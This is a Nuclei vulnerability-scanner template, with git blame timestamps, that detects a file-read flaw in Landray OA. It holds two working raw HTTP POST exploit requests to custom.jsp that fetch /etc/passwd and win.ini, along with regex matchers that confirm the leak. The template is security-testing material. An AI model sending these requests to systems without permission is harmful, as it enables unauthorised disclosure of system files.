nuclei-templates/vulnerabilities/other/landray-oa-fileread.yaml

47 lines
1.3 KiB
YAML
Raw Normal View History

2021-05-02 04:42:37 +00:00
id: landray-oa-fileread
info:
name: Landray-OA Fileread
author: pikpikcu
severity: high
2021-05-02 08:27:33 +00:00
reference: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
2021-05-02 04:42:37 +00:00
tags: landray,lfi
requests:
2021-05-02 08:27:33 +00:00
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
2021-05-02 08:28:47 +00:00
2021-05-02 08:27:33 +00:00
var={"body":{"file":"file:///etc/passwd"}}
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
2021-05-02 08:28:47 +00:00
2021-05-02 08:27:33 +00:00
var={"body":{"file":"file:///c://windows/win.ini"}}
2021-05-02 04:42:37 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
2021-05-02 08:27:33 +00:00
- "for 16-bit app support"
condition: or
2021-05-02 04:42:37 +00:00
- type: status
status:
2021-05-02 08:27:33 +00:00
- 200